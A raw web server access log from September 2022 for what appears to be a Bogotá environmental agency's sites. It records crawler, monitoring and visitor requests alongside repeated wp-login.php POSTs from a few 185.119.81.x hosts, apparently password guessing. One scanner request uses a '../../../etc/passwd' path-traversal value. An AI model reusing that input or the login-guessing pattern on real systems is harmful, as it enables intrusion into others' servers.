216.245.221.92 - - [06/Sep/2022:02:16:43 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [06/Sep/2022:02:16:53 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42606
185.119.81.102 - - [06/Sep/2022:02:18:24 -0500] "GET /portaldeninos/wp-login.php HTTP/1.1" 200 2592
185.119.81.102 - - [06/Sep/2022:02:18:25 -0500] "POST /portaldeninos/wp-login.php HTTP/1.1" 200 3605
172.22.2.4 - - [06/Sep/2022:02:17:05 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [06/Sep/2022:02:17:55 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60281
201.245.192.253 - - [06/Sep/2022:02:19:37 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 41855
201.245.192.253 - - [06/Sep/2022:02:19:41 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 42471
66.249.73.127 - - [06/Sep/2022:02:21:21 -0500] "-" 408 -
216.245.221.92 - - [06/Sep/2022:02:21:43 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [06/Sep/2022:02:21:52 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42606
157.55.39.8 - - [06/Sep/2022:02:23:53 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js;jsessionid=wez2puz7fqc8ixvba9ghfn9j.undefined?ln=primefaces&v=4.0 HTTP/1.1" 200 87560
185.119.81.105 - - [06/Sep/2022:02:23:56 -0500] "GET /portaldeninos/wp-login.php HTTP/1.1" 200 2592
185.119.81.105 - - [06/Sep/2022:02:23:57 -0500] "POST /portaldeninos/wp-login.php HTTP/1.1" 200 3605
185.119.81.105 - - [06/Sep/2022:02:24:02 -0500] "GET /portaldeninos/wp-login.php HTTP/1.1" 200 2592
185.119.81.105 - - [06/Sep/2022:02:24:03 -0500] "POST /portaldeninos/wp-login.php HTTP/1.1" 200 3650
172.22.2.4 - - [06/Sep/2022:02:22:55 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
207.46.13.16 - - [06/Sep/2022:02:25:05 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js;jsessionid=wez2puz7fqc8ixvba9ghfn9j.undefined?ln=primefaces&v=4.0 HTTP/1.1" 200 220526
172.22.2.4 - - [06/Sep/2022:02:23:45 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 52877
216.245.221.92 - - [06/Sep/2022:02:26:43 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [06/Sep/2022:02:26:51 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42606
157.55.39.8 - - [06/Sep/2022:02:28:51 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202001/2001%20450-499.TIF HTTP/1.1" 200 9011146
185.119.81.102 - - [06/Sep/2022:02:29:27 -0500] "GET /portaldeninos/wp-login.php HTTP/1.1" 200 2592
185.119.81.102 - - [06/Sep/2022:02:29:28 -0500] "POST /portaldeninos/wp-login.php HTTP/1.1" 200 3605
201.245.192.253 - - [06/Sep/2022:02:29:38 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 41855
201.245.192.253 - - [06/Sep/2022:02:29:42 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 42471
172.22.2.4 - - [06/Sep/2022:02:28:45 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
66.249.73.127 - - [06/Sep/2022:02:31:05 -0500] "-" 408 -
172.22.2.4 - - [06/Sep/2022:02:29:35 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 53640
216.245.221.92 - - [06/Sep/2022:02:31:43 -0500] "HEAD / HTTP/1.1" 200 -
185.119.81.96 - - [06/Sep/2022:02:31:44 -0500] "GET /portaldeninos/wp-login.php HTTP/1.1" 200 2592
185.119.81.96 - - [06/Sep/2022:02:31:45 -0500] "POST /portaldeninos/wp-login.php HTTP/1.1" 200 3605
201.245.192.253 - - [06/Sep/2022:02:31:50 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42606
172.22.2.4 - - [06/Sep/2022:02:33:40 -0500] "GET /BLA/boletinlegal/jurisprudencia/analisis/ANALISIST-257-96.docx HTTP/1.1" 200 19486
207.46.13.51 - - [06/Sep/2022:02:34:52 -0500] "GET /si-eres-mujer-y-te-gusta-el-cuidado-de-los-humedales-este-proceso-de-formacion-es-para-ti.html HTTP/1.1" 304 -
172.22.2.4 - - [06/Sep/2022:02:35:20 -0500] "GET /BLA/boletinlegal/dns-query?dns=q80BAAABAAAAAAAAA3d3dwdleGFtcGxlA2NvbQAAAQAB HTTP/1.1" 406 -
172.22.2.4 - - [06/Sep/2022:02:35:20 -0500] "GET /BLA/boletinlegal/go/add-on/business-continuity/api/plugin?folderName=&pluginName=../../../etc/passwd HTTP/1.1" 404 1038
172.22.2.4 - - [06/Sep/2022:02:35:20 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 24523
172.22.2.4 - - [06/Sep/2022:02:34:35 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.245.221.92 - - [06/Sep/2022:02:36:43 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [06/Sep/2022:02:36:49 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42606
207.46.13.186 - - [06/Sep/2022:02:36:57 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202021/1284.pdf HTTP/1.1" 200 540532
172.22.2.4 - - [06/Sep/2022:02:35:25 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 55220
201.245.192.253 - - [06/Sep/2022:02:39:37 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 41855
201.245.192.253 - - [06/Sep/2022:02:39:41 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 42471
66.249.73.127 - - [06/Sep/2022:02:41:08 -0500] "-" 408 -
216.245.221.92 - - [06/Sep/2022:02:41:43 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [06/Sep/2022:02:41:48 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42606
172.22.2.4 - - [06/Sep/2022:02:40:25 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [06/Sep/2022:02:41:15 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58163
172.22.2.4 - - [06/Sep/2022:02:43:25 -0500] "GET /BLA/boletinlegal/actos.php HTTP/1.1" 200 9559
172.22.2.4 - - [06/Sep/2022:02:43:39 -0500] "GET /BLA/boletinlegal/js/jquery1.js HTTP/1.1" 200 29846
172.22.2.4 - - [06/Sep/2022:02:43:40 -0500] "GET /BLA/boletinlegal/js/popup.js HTTP/1.1" 200 1270
172.22.2.4 - - [06/Sep/2022:02:43:42 -0500] "GET /BLA/boletinlegal/js/lib.js HTTP/1.1" 200 6474
172.22.2.4 - - [06/Sep/2022:02:43:43 -0500] "GET /BLA/boletinlegal/js/ajax_actos.js HTTP/1.1" 200 1322
172.22.2.4 - - [06/Sep/2022:02:43:48 -0500] "GET /BLA/boletinlegal/styles2.css HTTP/1.1" 200 1838
172.22.2.4 - - [06/Sep/2022:02:43:54 -0500] "GET /BLA/boletinlegal/niceforms-default.css HTTP/1.1" 200 6694
172.22.2.4 - - [06/Sep/2022:02:43:54 -0500] "GET /BLA/boletinlegal/niceforms.js HTTP/1.1" 200 22876
173.252.83.117 - - [06/Sep/2022:02:45:57 -0500] "GET /catalogoisis/imagenes/Header.gif HTTP/1.1" 200 30313
216.245.221.92 - - [06/Sep/2022:02:46:43 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [06/Sep/2022:02:46:48 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42606
66.249.73.127 - - [06/Sep/2022:02:47:47 -0500] "-" 408 -
172.22.2.4 - - [06/Sep/2022:02:46:15 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [06/Sep/2022:02:47:05 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58575
172.22.2.4 - - [06/Sep/2022:02:50:01 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 63207
216.245.221.92 - - [06/Sep/2022:02:51:43 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [06/Sep/2022:02:51:47 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42606
185.119.81.107 - - [06/Sep/2022:02:53:03 -0500] "GET /portaldeninos/wp-login.php HTTP/1.1" 200 2592
185.119.81.107 - - [06/Sep/2022:02:53:04 -0500] "POST /portaldeninos/wp-login.php HTTP/1.1" 200 3670
157.55.39.34 - - [06/Sep/2022:02:53:09 -0500] "GET /inicio/humedal-cordoba/ HTTP/1.1" 404 1049
172.22.2.4 - - [06/Sep/2022:02:52:05 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
66.249.73.127 - - [06/Sep/2022:02:54:20 -0500] "-" 408 -
172.22.2.4 - - [06/Sep/2022:02:52:55 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 56376
216.245.221.92 - - [06/Sep/2022:02:56:43 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [06/Sep/2022:02:56:46 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42606
172.22.2.4 - - [06/Sep/2022:02:58:22 -0500] "GET /BLA/boletinlegal/Circulares/2012/Circular%20No.%201%20del%2017%20de%20Enero%20de%202012.pdf HTTP/1.1" 304 -
172.22.2.4 - - [06/Sep/2022:02:57:55 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [06/Sep/2022:02:58:45 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 54003
66.249.73.127 - - [06/Sep/2022:03:01:01 -0500] "-" 408 -
216.245.221.92 - - [06/Sep/2022:03:01:43 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [06/Sep/2022:03:01:45 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42606
207.46.13.16 - - [06/Sep/2022:03:02:18 -0500] "GET /forest/ HTTP/1.1" 200 12041
207.46.13.16 - - [06/Sep/2022:03:02:18 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS+2013%2F HTTP/1.1" 200 405961
172.22.2.4 - - [06/Sep/2022:03:03:45 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [06/Sep/2022:03:05:34 -0500] "GET /BLA/boletinlegal/Directivas/2016/Directiva%20No.%2002%20del%2019%20de%20Abril%20de%202016.pdf HTTP/1.1" 304 -
185.119.81.105 - - [06/Sep/2022:03:05:45 -0500] "GET /portaldeninos/wp-login.php HTTP/1.1" 200 2592
185.119.81.105 - - [06/Sep/2022:03:05:46 -0500] "POST /portaldeninos/wp-login.php HTTP/1.1" 200 3605
172.22.2.4 - - [06/Sep/2022:03:04:35 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60281
216.245.221.92 - - [06/Sep/2022:03:06:43 -0500] "HEAD / HTTP/1.1" 200 -
66.249.73.127 - - [06/Sep/2022:03:06:43 -0500] "-" 408 -
201.245.192.253 - - [06/Sep/2022:03:06:44 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42606
185.119.81.96 - - [06/Sep/2022:03:08:57 -0500] "GET /portaldeninos/wp-login.php HTTP/1.1" 200 2592
185.119.81.96 - - [06/Sep/2022:03:08:58 -0500] "POST /portaldeninos/wp-login.php HTTP/1.1" 200 3670
185.119.81.105 - - [06/Sep/2022:03:09:33 -0500] "GET /portaldeninos/wp-login.php HTTP/1.1" 200 2592
185.119.81.105 - - [06/Sep/2022:03:09:34 -0500] "POST /portaldeninos/wp-login.php HTTP/1.1" 200 3670
185.119.81.102 - - [06/Sep/2022:03:10:30 -0500] "GET /portaldeninos/wp-login.php HTTP/1.1" 200 2592
185.119.81.102 - - [06/Sep/2022:03:10:31 -0500] "POST /portaldeninos/wp-login.php HTTP/1.1" 200 3605
172.22.2.4 - - [06/Sep/2022:03:09:35 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.245.221.92 - - [06/Sep/2022:03:11:43 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [06/Sep/2022:03:11:43 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42606
172.22.2.4 - - [06/Sep/2022:03:10:25 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57375
66.249.73.127 - - [06/Sep/2022:03:12:39 -0500] "-" 408 -
157.55.39.80 - - [06/Sep/2022:03:13:59 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202015/1042.pdf HTTP/1.1" 304 -
216.245.221.92 - - [06/Sep/2022:03:16:43 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [06/Sep/2022:03:16:42 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42606
172.22.2.4 - - [06/Sep/2022:03:15:25 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [06/Sep/2022:03:16:15 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58163
66.249.73.97 - - [06/Sep/2022:03:18:17 -0500] "-" 408 -
37.70.194.115 - - [06/Sep/2022:03:18:35 -0500] "GET /forest/ HTTP/1.1" 200 12041
37.70.194.115 - - [06/Sep/2022:03:18:40 -0500] "POST /forest/index.php HTTP/1.1" 200 12268
201.245.192.253 - - [06/Sep/2022:03:19:38 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 41962
201.245.192.253 - - [06/Sep/2022:03:19:41 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 42463
172.22.2.4 - - [06/Sep/2022:03:19:57 -0500] "GET /BLA/boletinlegal/normativa.php HTTP/1.1" 200 8326
216.245.221.92 - - [06/Sep/2022:03:21:43 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [06/Sep/2022:03:21:41 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42606
69.63.184.118 - - [06/Sep/2022:03:22:16 -0500] "GET /images/Bolsaroja.jpeg HTTP/1.1" 200 63719
69.63.184.2 - - [06/Sep/2022:03:22:17 -0500] "GET /en-bolsas-rojas-no-se-depositan-residuos-ordinarios-solo-infecciosos-o-similares.html HTTP/1.1" 206 1094
172.22.2.4 - - [06/Sep/2022:03:21:15 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
185.119.81.105 - - [06/Sep/2022:03:22:55 -0500] "GET /portaldeninos/wp-login.php HTTP/1.1" 200 2592
185.119.81.105 - - [06/Sep/2022:03:22:56 -0500] "POST /portaldeninos/wp-login.php HTTP/1.1" 200 3605
172.22.2.4 - - [06/Sep/2022:03:22:05 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 55220
34.125.121.176 - - [06/Sep/2022:03:23:54 -0500] "GET /BLA/boletinlegal/js/jquery.scrollShow.js HTTP/1.1" 200 4586
34.125.121.176 - - [06/Sep/2022:03:23:54 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5 HTTP/1.1" 200 4895
34.125.121.176 - - [06/Sep/2022:03:23:54 -0500] "GET /galeria/galeria/jquery.fancybox.js?v=2.1.5 HTTP/1.1" 200 48706
34.125.121.176 - - [06/Sep/2022:03:23:57 -0500] "GET /galeria/carrusel/Carrusel/jquery.thumbnailScroller.css HTTP/1.1" 200 2066
34.125.121.176 - - [06/Sep/2022:03:23:57 -0500] "GET /galeria/carrusel/Carrusel/jquery-ui-1.8.13.custom.min.js HTTP/1.1" 200 10800
34.125.121.176 - - [06/Sep/2022:03:23:57 -0500] "GET /galeria/carrusel/Carrusel/jquery.thumbnailScroller.js HTTP/1.1" 200 8157
34.125.121.176 - - [06/Sep/2022:03:23:59 -0500] "GET /galeria/nivo-slider/demo/banner.html HTTP/1.1" 200 5446
34.125.121.176 - - [06/Sep/2022:03:24:00 -0500] "GET /galeria/nivo-slider/themes/default/default.css HTTP/1.1" 200 1569
34.125.121.176 - - [06/Sep/2022:03:24:00 -0500] "GET /galeria/nivo-slider/themes/orman/orman.css HTTP/1.1" 200 2152
34.125.121.176 - - [06/Sep/2022:03:24:00 -0500] "GET /galeria/nivo-slider/nivo-slider.css HTTP/1.1" 200 1507
34.125.121.176 - - [06/Sep/2022:03:24:00 -0500] "GET /galeria/nivo-slider/themes/pascal/pascal.css HTTP/1.1" 200 2258
34.125.20.30 - - [06/Sep/2022:03:24:00 -0500] "GET /galeria/nivo-slider/demo/scripts/jquery-1.7.1.min.js HTTP/1.1" 200 93868
34.125.121.176 - - [06/Sep/2022:03:24:00 -0500] "GET /galeria/nivo-slider/demo/style.css HTTP/1.1" 200 2222
34.125.121.176 - - [06/Sep/2022:03:24:00 -0500] "GET /galeria/nivo-slider/jquery.nivo.slider.pack.js HTTP/1.1" 200 11561
34.125.121.176 - - [06/Sep/2022:03:24:00 -0500] "GET /galeria/nivo-slider/demo/images/bannertortuga_optimized.jpg HTTP/1.1" 200 39066
34.125.20.30 - - [06/Sep/2022:03:24:00 -0500] "GET /galeria/nivo-slider/demo/images/Bannersedeelectronica.jpg HTTP/1.1" 200 40383
34.125.121.176 - - [06/Sep/2022:03:24:00 -0500] "GET /galeria/nivo-slider/demo/images/bannertrafico_optimized.jpg HTTP/1.1" 200 42578
34.125.121.176 - - [06/Sep/2022:03:24:00 -0500] "GET /galeria/nivo-slider/demo/images/Bannermujeresquereverdecen.jpg HTTP/1.1" 200 46558
34.125.121.176 - - [06/Sep/2022:03:24:00 -0500] "GET /galeria/nivo-slider/demo/images/bannerrutaesperanza.jpg HTTP/1.1" 200 55560
34.125.121.176 - - [06/Sep/2022:03:24:01 -0500] "GET /galeria/nivo-slider/demo/images/banneraire2021.jpg HTTP/1.1" 200 265101
34.125.121.176 - - [06/Sep/2022:03:24:01 -0500] "GET /galeria/nivo-slider/demo/images/4Simple_Slider.png HTTP/1.1" 200 11722
34.125.121.176 - - [06/Sep/2022:03:24:02 -0500] "GET /galeria/nivo-slider/themes/default/loading.gif HTTP/1.1" 200 1737
34.125.20.30 - - [06/Sep/2022:03:24:02 -0500] "GET /galeria/nivo-slider/demo/images/Bannerplasticosseptiembre.jpg HTTP/1.1" 200 45633
34.125.121.176 - - [06/Sep/2022:03:24:02 -0500] "GET /galeria/nivo-slider/demo/images/bannerresiduoshospitalariosagosto.jpg HTTP/1.1" 200 36499
34.125.121.176 - - [06/Sep/2022:03:24:02 -0500] "GET /galeria/nivo-slider/demo/images/banneraccionpopularcrr68.jpg HTTP/1.1" 200 51887
34.125.121.176 - - [06/Sep/2022:03:24:02 -0500] "GET /galeria/nivo-slider/demo/images/banneraccionpopular.jpeg HTTP/1.1" 200 41707
34.125.20.30 - - [06/Sep/2022:03:24:02 -0500] "GET /galeria/nivo-slider/demo/images/bannerclases2021.jpg HTTP/1.1" 200 68230
34.125.121.176 - - [06/Sep/2022:03:24:02 -0500] "GET /galeria/nivo-slider/demo/images/bannercapacitacionesbogota.jpg HTTP/1.1" 200 42416
34.125.121.176 - - [06/Sep/2022:03:24:03 -0500] "GET /galeria/nivo-slider/demo/images/Bannerenvases.jpg HTTP/1.1" 200 37316
34.125.20.30 - - [06/Sep/2022:03:24:03 -0500] "GET /galeria/nivo-slider/demo/images/Bannervirtualescanales.jpg HTTP/1.1" 200 174544
34.125.20.30 - - [06/Sep/2022:03:24:10 -0500] "GET /galeria/nivo-slider/themes/default/arrows.png HTTP/1.1" 200 824
34.125.20.30 - - [06/Sep/2022:03:24:10 -0500] "GET /galeria/nivo-slider/themes/default/bullets.png HTTP/1.1" 200 1281
207.46.13.186 - - [06/Sep/2022:03:24:41 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202001/2001%20400-449.TIF HTTP/1.1" 200 9262392
66.249.73.127 - - [06/Sep/2022:03:25:02 -0500] "-" 408 -
172.22.2.4 - - [06/Sep/2022:03:25:04 -0500] "GET /BLA/boletinlegal/Directivas/2013/Directiva%20No.%203%20del%2016%20de%20julio%20de%202013.pdf HTTP/1.1" 200 127414
201.245.192.253 - - [06/Sep/2022:03:26:39 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42606
216.245.221.92 - - [06/Sep/2022:03:26:43 -0500] "HEAD / HTTP/1.1" 200 -
34.125.121.176 - - [06/Sep/2022:03:27:27 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5 HTTP/1.1" 200 4895
34.125.121.176 - - [06/Sep/2022:03:27:27 -0500] "GET /BLA/boletinlegal/js/jquery.scrollShow.js HTTP/1.1" 200 4586
34.125.121.176 - - [06/Sep/2022:03:27:27 -0500] "GET /galeria/galeria/jquery.fancybox.js?v=2.1.5 HTTP/1.1" 200 48706
34.125.121.176 - - [06/Sep/2022:03:27:29 -0500] "GET /galeria/carrusel/Carrusel/jquery.thumbnailScroller.css HTTP/1.1" 200 2066
34.125.121.176 - - [06/Sep/2022:03:27:31 -0500] "GET /galeria/carrusel/Carrusel/jquery-ui-1.8.13.custom.min.js HTTP/1.1" 200 10800
34.125.121.176 - - [06/Sep/2022:03:27:31 -0500] "GET /galeria/carrusel/Carrusel/jquery.thumbnailScroller.js HTTP/1.1" 200 8157
34.125.121.176 - - [06/Sep/2022:03:27:32 -0500] "GET /galeria/nivo-slider/demo/banner.html HTTP/1.1" 200 5446
34.125.121.176 - - [06/Sep/2022:03:27:32 -0500] "GET /galeria/nivo-slider/themes/default/default.css HTTP/1.1" 200 1569
34.125.121.176 - - [06/Sep/2022:03:27:32 -0500] "GET /galeria/nivo-slider/themes/pascal/pascal.css HTTP/1.1" 200 2258
34.125.121.176 - - [06/Sep/2022:03:27:32 -0500] "GET /galeria/nivo-slider/themes/orman/orman.css HTTP/1.1" 200 2152
34.125.121.176 - - [06/Sep/2022:03:27:32 -0500] "GET /galeria/nivo-slider/nivo-slider.css HTTP/1.1" 200 1507
34.125.121.176 - - [06/Sep/2022:03:27:33 -0500] "GET /galeria/nivo-slider/demo/style.css HTTP/1.1" 200 2222
34.125.121.176 - - [06/Sep/2022:03:27:33 -0500] "GET /galeria/nivo-slider/demo/scripts/jquery-1.7.1.min.js HTTP/1.1" 200 93868
34.125.121.176 - - [06/Sep/2022:03:27:33 -0500] "GET /galeria/nivo-slider/jquery.nivo.slider.pack.js HTTP/1.1" 200 11561
34.125.121.176 - - [06/Sep/2022:03:27:33 -0500] "GET /galeria/nivo-slider/demo/images/bannertortuga_optimized.jpg HTTP/1.1" 200 39066
34.125.121.176 - - [06/Sep/2022:03:27:33 -0500] "GET /galeria/nivo-slider/demo/images/Bannermujeresquereverdecen.jpg HTTP/1.1" 200 46558
34.125.121.176 - - [06/Sep/2022:03:27:33 -0500] "GET /galeria/nivo-slider/demo/images/bannertrafico_optimized.jpg HTTP/1.1" 200 42578
34.125.121.176 - - [06/Sep/2022:03:27:33 -0500] "GET /galeria/nivo-slider/demo/images/Bannersedeelectronica.jpg HTTP/1.1" 200 40383
34.125.121.176 - - [06/Sep/2022:03:27:34 -0500] "GET /galeria/nivo-slider/demo/images/4Simple_Slider.png HTTP/1.1" 200 11722
34.125.121.176 - - [06/Sep/2022:03:27:35 -0500] "GET /galeria/nivo-slider/themes/default/loading.gif HTTP/1.1" 200 1737
34.125.121.176 - - [06/Sep/2022:03:27:36 -0500] "GET /galeria/nivo-slider/demo/images/bannerrutaesperanza.jpg HTTP/1.1" 200 55560
34.125.121.176 - - [06/Sep/2022:03:27:36 -0500] "GET /galeria/nivo-slider/demo/images/banneraire2021.jpg HTTP/1.1" 200 265101
34.125.121.176 - - [06/Sep/2022:03:27:37 -0500] "GET /galeria/nivo-slider/demo/images/Bannerplasticosseptiembre.jpg HTTP/1.1" 200 45633
34.125.121.176 - - [06/Sep/2022:03:27:37 -0500] "GET /galeria/nivo-slider/demo/images/bannerresiduoshospitalariosagosto.jpg HTTP/1.1" 200 36499
34.125.121.176 - - [06/Sep/2022:03:27:38 -0500] "GET /galeria/nivo-slider/demo/images/banneraccionpopularcrr68.jpg HTTP/1.1" 200 51887
34.125.121.176 - - [06/Sep/2022:03:27:38 -0500] "GET /galeria/nivo-slider/demo/images/banneraccionpopular.jpeg HTTP/1.1" 200 41707
34.125.121.176 - - [06/Sep/2022:03:27:39 -0500] "GET /galeria/nivo-slider/demo/images/bannerclases2021.jpg HTTP/1.1" 200 68230
34.125.121.176 - - [06/Sep/2022:03:27:39 -0500] "GET /galeria/nivo-slider/demo/images/bannercapacitacionesbogota.jpg HTTP/1.1" 200 42416
34.125.121.176 - - [06/Sep/2022:03:27:39 -0500] "GET /galeria/nivo-slider/demo/images/Bannerenvases.jpg HTTP/1.1" 200 37316
34.125.121.176 - - [06/Sep/2022:03:27:40 -0500] "GET /galeria/nivo-slider/demo/images/Bannervirtualescanales.jpg HTTP/1.1" 200 174544
34.125.121.176 - - [06/Sep/2022:03:27:45 -0500] "GET /galeria/nivo-slider/themes/default/arrows.png HTTP/1.1" 200 824
34.125.121.176 - - [06/Sep/2022:03:27:45 -0500] "GET /galeria/nivo-slider/themes/default/bullets.png HTTP/1.1" 200 1281
172.22.2.4 - - [06/Sep/2022:03:27:05 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [06/Sep/2022:03:27:55 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 52877
201.245.192.253 - - [06/Sep/2022:03:29:38 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 41962
185.119.81.107 - - [06/Sep/2022:03:29:40 -0500] "GET /portaldeninos/wp-login.php HTTP/1.1" 200 2592
185.119.81.107 - - [06/Sep/2022:03:29:41 -0500] "POST /portaldeninos/wp-login.php HTTP/1.1" 200 3605
201.245.192.253 - - [06/Sep/2022:03:29:41 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 42463
201.245.192.253 - - [06/Sep/2022:03:31:39 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42606
216.245.221.92 - - [06/Sep/2022:03:31:43 -0500] "HEAD / HTTP/1.1" 200 -
66.249.73.127 - - [06/Sep/2022:03:31:53 -0500] "-" 408 -
172.22.2.4 - - [06/Sep/2022:03:32:55 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [06/Sep/2022:03:33:45 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60281
106.75.72.141 - - [06/Sep/2022:03:35:57 -0500] "GET / HTTP/1.1" 200 319
106.75.72.141 - - [06/Sep/2022:03:35:58 -0500] "GET /favicon.ico HTTP/1.1" 200 7782
106.75.72.141 - - [06/Sep/2022:03:36:01 -0500] "GET /sitemap.xml HTTP/1.1" 404 1018
157.55.39.66 - - [06/Sep/2022:03:36:33 -0500] "GET /portaldeninos/2021/06/06/ciudadanos-disfrutaron-del-tunel-ambiental-en-el-parque-de-los-novios/ HTTP/1.1" 200 105118
201.245.192.253 - - [06/Sep/2022:03:36:38 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42606
216.245.221.92 - - [06/Sep/2022:03:36:43 -0500] "HEAD / HTTP/1.1" 200 -
66.249.73.127 - - [06/Sep/2022:03:38:01 -0500] "-" 408 -
201.245.192.253 - - [06/Sep/2022:03:39:37 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 41962
201.245.192.253 - - [06/Sep/2022:03:39:41 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 42463
172.22.2.4 - - [06/Sep/2022:03:38:45 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [06/Sep/2022:03:39:35 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58163
201.245.192.253 - - [06/Sep/2022:03:41:36 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42606
216.245.221.92 - - [06/Sep/2022:03:41:43 -0500] "HEAD / HTTP/1.1" 200 -
66.249.73.127 - - [06/Sep/2022:03:45:14 -0500] "-" 408 -
172.22.2.4 - - [06/Sep/2022:03:44:35 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [06/Sep/2022:03:46:34 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42606
216.245.221.92 - - [06/Sep/2022:03:46:43 -0500] "HEAD / HTTP/1.1" 200 -
185.119.81.102 - - [06/Sep/2022:03:46:44 -0500] "GET /portaldeninos/wp-login.php HTTP/1.1" 200 2592
185.119.81.102 - - [06/Sep/2022:03:46:45 -0500] "POST /portaldeninos/wp-login.php HTTP/1.1" 200 3605
172.22.2.4 - - [06/Sep/2022:03:45:25 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58575
34.91.25.49 - - [06/Sep/2022:03:48:22 -0500] "GET / HTTP/1.1" 200 4720
34.91.25.49 - - [06/Sep/2022:03:48:22 -0500] "GET / HTTP/1.1" 200 319
201.245.192.253 - - [06/Sep/2022:03:51:33 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42606
216.245.221.92 - - [06/Sep/2022:03:51:43 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [06/Sep/2022:03:50:25 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [06/Sep/2022:03:51:15 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 52877
